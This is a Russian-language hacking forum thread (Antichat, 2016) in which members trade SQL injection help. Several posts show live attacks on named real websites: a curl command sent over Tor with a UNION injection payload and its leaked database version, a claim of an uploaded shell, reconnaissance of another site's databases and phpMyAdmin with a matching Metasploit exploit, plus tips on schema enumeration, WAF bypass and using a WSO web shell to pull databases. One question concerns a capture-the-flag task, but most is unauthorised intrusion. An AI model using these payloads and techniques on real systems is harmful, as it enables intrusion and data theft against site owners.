Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    816
    Reputations:
    90
    Code:
    curl -s -k --proxy socks5://127.0.0.1:9150 -A 'mozilla' 'http://www.caresoft.ind.in/info.php' --data 'show=185+union+select+1,2,3,4,concat(999,char(58),version()),6,7+--+s'  | grep 999
              <td width="100%" class="text">999:5.1.68-community</td>
    
     
    _________________________
    BabaDook likes this.
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    816
    Reputations:
    90
    да и как не злиться на людей который выкладывают дамп ачата на ачате?

    по врапперам кстати неплохая шпаргалка
    https://www.ptsecurity.com/ru-ru/ics/А.Москвин_О_безоп_исп_РНР_wrappers.pdf

    сорцы не смотрел в итоге? там забавный мускул пользователь с такими грантами что можно поменять хэш рутового мускул пользователя
     
    _________________________
    #1482 t0ma5, 10 Nov 2016
    Last edited: 11 Nov 2016
  3. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    шелл залил в пм написал
     
    WallHack likes this.
  4. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    118
    Reputations:
    26
    Спасибо, поторопился я с выводами.
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    816
    Reputations:
    90
    подкиньте мысль, boolen-based скуль, waf фильтрует "union" ")" "/" "="
    какие могут быть варианты запросов?
    = можно обойти оператором "like", / в общем то не особо и нужен, за union я уже смирился, но вот чертова закрывающая скобка -_- ( именно waf, потому что в хедерах есть статус Waf-Capulta: Passed/Blocked )
    даблурлэнкод пробовал
    post/get waf обрабатывает, через cookie данные не уходят
    потыкать можно тут ringzer0team.com ( sqlj последний таск "Internet As A Service" )
    -------------------------
    что удалось узнать, все эти запросы как то связаны со https://ringzer0team.slack.com ( то есть с slack.com )
    правда при чем тут мускул не понятно, не одного нормального примера кода в интернетах не нашел
    в запросе присутствуют поля url,title,description
    некоторые параметры бд

    storage_engine = InnoDB
    hostname = lxc26-sql-search
    version = 5.5.50-0ubuntu0.14.04.1
    sql_mode = NULL
    datadir = /var/lib/mysql

    в корне сайт два бесполезных файла

    /files/test.txt
    /files/useless.txt

    :(
     
    _________________________
    #1485 t0ma5, 11 Nov 2016
    Last edited: 11 Nov 2016
  6. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    384
    Likes Received:
    261
    Reputations:
    3
    Подскажите пож, каким запросом посмотреть базы данных которые лежат рядом?
     
  7. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    если в mysql
    select schema_name from information_schema.schemata limit 0,1 - выводит названия бд далее limit 1,1 ; limit 2,1 и т д

    select table_name from information_schema.tables where table_schema='название бд которую вывел в пред запросе'
    или если не выводит в hex
    select table_name from information_schema.tables where table_schema=0x002.....


    https://forum.antichat.ru/threads/43966/
     
    karkajoi likes this.
  8. hiderat

    hiderat New Member

    Joined:
    9 Oct 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Подскажите как забрать базу sql если к ней нет доступа из инета?
    Мож скриптик какой есть?
    Provider=SQLOLEDB.1
    Data Source=.\SQLEXPRESS
     
  9. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    384
    Likes Received:
    261
    Reputations:
    3
    Скрипт называется WebShell (WSO), только он работает локально. В нем есть функция подключения к бд
     
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    #1490 Octavian, 14 Nov 2016
    Last edited: 14 Nov 2016
  11. EvilSQL

    EvilSQL Banned

    Joined:
    12 Jan 2016
    Messages:
    32
    Likes Received:
    12
    Reputations:
    3
    нет прочитать нельзя.

    Code:
    Web Server:     Apache/2.2.22 (Ubuntu)
    Powered-by:     PHP/5.3.10-1ubuntu3.18
    Current DB:     icfi
    Data Bases:     information_schema
                         icfi
                         test
    
    http://icfi.ulim.md/phpmyadmin/
    http://icfi.ulim.md/phpmyadmin/Documentation.html
    phpMyAdmin 3.4.10.1
    phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)
    
    
     
    #1491 EvilSQL, 14 Nov 2016
    Last edited: 14 Nov 2016
    qqq1457 likes this.
  12. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    174
    Likes Received:
    278
    Reputations:
    46
    Столкнулся с небольшой проблемой при эксплуатации error-based инъекции. GET запрос лимитирован до 255 символов. Все доступные вектора больше этого лимита (короткие типа extractvalue, updatexml, bigint overflow - не работают). Подскажите пути решения проблемы.
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Попробуй уязвимый параметр передать через POST
     
    _________________________
  14. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    174
    Likes Received:
    278
    Reputations:
    46
    По-сути там даже не параметра. Только GET.
     
  15. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    174
    Likes Received:
    278
    Reputations:
    46
    Второе.
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    #1496 BabaDook, 18 Nov 2016
    Last edited: 21 Nov 2016
  17. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    _________________________
    t0ma5, BabaDook and qqq1457 like this.
  19. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    мудрено но годно хотя програмно это все быстро выводится
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Программно это через error вектор в несколько десятков потоков? Нужно учиться самому, так больше пользы будет и эффекта в поисках уязвимостей, и не всегда программа может пройти там, где сможете пройти вы!
     
    _________________________
    Octavian and t0ma5 like this.
Loading...